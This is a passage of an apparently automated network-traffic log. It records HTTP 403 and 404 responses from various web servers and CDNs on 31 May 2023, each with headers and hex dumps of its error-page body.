5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 Data Ascii: 11a0<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compa
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:50:27 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMd9SdXPLd+IHpGdJMT+4ixQ,qquldgcFrj2n046g4RNSVE8eNr0PeAeqFyO7fo2b794=X-Wix-Request-Id: 1685537427.970346822111617608X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 31 May 2023 12:50:28 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:50:29 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:50:29 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:50:29 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Cf-Railgun: direct (starting new WAN connection)Pragma: no-cacheVary: User-Agent,User-AgentX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uWgva6ag85yF8c8sFsU4ROoHotrUCGWiY1UTvx%2BtrZlKZ6T6b7vzvnyE1PRYJ95vHLqJAOo0epjvWA601lH3nyU10SSkmLkB%2BmNPwP7MsYDXNl5yTpcAMvvivzmrMwx4Pj8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff57c88e021959-FRAalt-svc: h3=":443"; ma=86400Data Raw: 34 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 Data Ascii: 4bf<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"><h1 style="margin:0; font-size:150px; line-height:150px
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:50:32 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CuwQtHHdZLr%2FQyj4XIgF%2BCP73xU40ciQrQio%2B0sMevIq5WyTQHIrQ3fyUb6FyErTrSh0TcIhKtTsmyzFPTq%2FD21iG3S7dLQMsC1h5l2QFgPvyAB1KHBf1VXenz7cCKaf"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff57d7a90c39d4-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:50:32 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UUOPqEKLfgx1ysAYbV22jNxafK5O%2Fp4k55pYAtV7Wc%2F3B5RSePf7vbyuEsQ2WT0UGxbpOnr4%2FdwXXOk8%2Bw3Ts%2Bp9YyRYODKHI5108BIXZUQXNC5XN8D5jBNSOYaENoko"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff57d7d94d39d4-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 31 May 2023 12:50:32 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=13X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-east1,gcp-us-east1X-Request-ID: a557f1c5-c6e0-48e0-9fc2-68e9ee0f7d1dCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2JzyVBge5KLsaHVCxWJ55KERHrCeadydxYx3fJV9oZRhHCDURKJ1tgvNsziq6Gtlylj1xhbjgGehFxu9hFhC1PybiFHmTAYwV8Z0JS%2Bt52tO4nqsmwEb3MOx%2B5eYBBY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=132.999897Server: cloudflareCF-RAY: 7cff57d7cd5e35f9-FRAalt-svc: h3=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveServer: ZENEDGECache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0X-Zen-Fury: 3526d3c3c3b245124699395dfe8f5b0b8d94817dX-Cache-Status: Date: Wed, 31 May 2023 12:50:33 GMTData Raw: 31 66 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 34 33 35 30 22 2c 20 31 36 38 35 35 33 37 34 30 34 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 1f9<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC4350", 1685537404, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:50:39 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:50:39 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:50:46 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ErAqLpnplrLW89qfFJJZkRhODUtDY4mFcqoGW9gQt75lDCwSUY67b5kUkSLAFkm%2FE6R%2FNNP6AxWnObnQpkK9mrHF3vFuop3uxgTOdfC9GfDgKqfgYh5peQ%2Bamzif4JM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff582fac2c9ba7-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:50:46 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WLXwh1HfRWEkO5Fb7Q0VZtCVOkw6ton1TOZpMJmuEDWHdxh%2BkaZZWZnLX1cZqclIuP6UJlyWiC4I7YN74oMad3dWkBWBQwhFpr7XZ2FJJZyQ%2FEfgS1N8y%2Bmt4a7AtPc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff582feca39ba7-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 31 May 2023 12:50:48 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 